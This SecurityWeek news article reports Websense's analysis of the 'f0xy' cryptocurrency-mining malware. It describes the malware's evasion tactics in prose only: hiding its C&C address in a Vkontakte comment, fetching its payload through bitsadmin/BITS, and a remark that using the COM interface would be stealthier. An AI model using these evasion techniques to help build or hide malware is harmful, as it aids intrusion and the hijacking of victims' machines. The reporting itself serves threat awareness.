Connect with us

Hi, what are you looking for?


Malware & Threats

New “F0xy” Malware Uses Clever Techniques to Stay Hidden

New Malware Downloads Cryptocurrency Miner to Infected Devices

Researchers at Websense have come across a new piece of malware that leverages legitimate websites and services in an effort to disguise its malicious activities.

New Malware Downloads Cryptocurrency Miner to Infected Devices

Researchers at Websense have come across a new piece of malware that leverages legitimate websites and services in an effort to disguise its malicious activities.

The threat has been dubbed “f0xy” not only because it’s cunning like a fox, but also because this particular string has been found in its executables and the registries it creates for persistence.

The earliest samples identified by researchers are dated January 13, 2015, but the malware has been enhanced by its creators since. Initial variants only worked on Windows Vista and later versions of Microsoft’s operating system, but newer variants also work on Windows XP, Websense said.

The initial dropper was detected by only 5 of the antivirus engines on VirusTotal when it was analyzed by Websense. The detection rate has increased since, but it’s still fairly low.

According to researchers, the developers of f0xy chose not to obfuscate the malware’s code, most likely in an effort to make it look more legitimate and avoid raising suspicion.

Another method used to hide the presence of the threat involves the Russian social media website Vkontakte. The malware contains an encoded string that hides a URL pointing to a certain Vkontakte profile. An encoded string posted on the said profile as a comment contains the URL for the command and control (C&C) server used by the malware.

Advertisement. Scroll to continue reading.

Once the f0xy downloader finds itself on a computer, it leverages the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. BITS is designed for transferring files between a client and a server using idle network bandwidth. The component is leveraged by services like Windows Defender and Windows Update.

“Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable,” Websense researcher Nick Griffin wrote in a blog post.

In this case, the malware calls the bitsadmin executable directly to specify the parameters for the file transfer (source and destination of the file). However, experts have pointed out that the transfer can be made even stealthier by interacting with BITS through the Component Object Model (COM) interface.

The payload spotted by Websense is a 64-bit version of CPUMiner, a popular open source cryptocurrency mining application. The attackers use the mining pool to ensure that all the virtual currency mined by the infected machines go to them.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

A vulnerability affecting IBM’s Aspera Faspex file transfer solution, tracked as CVE-2022-47986, has been exploited in attacks.


The recent ransomware attack targeting Rackspace was conducted by a cybercrime group named Play using a new exploitation method, the cloud company revealed this...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...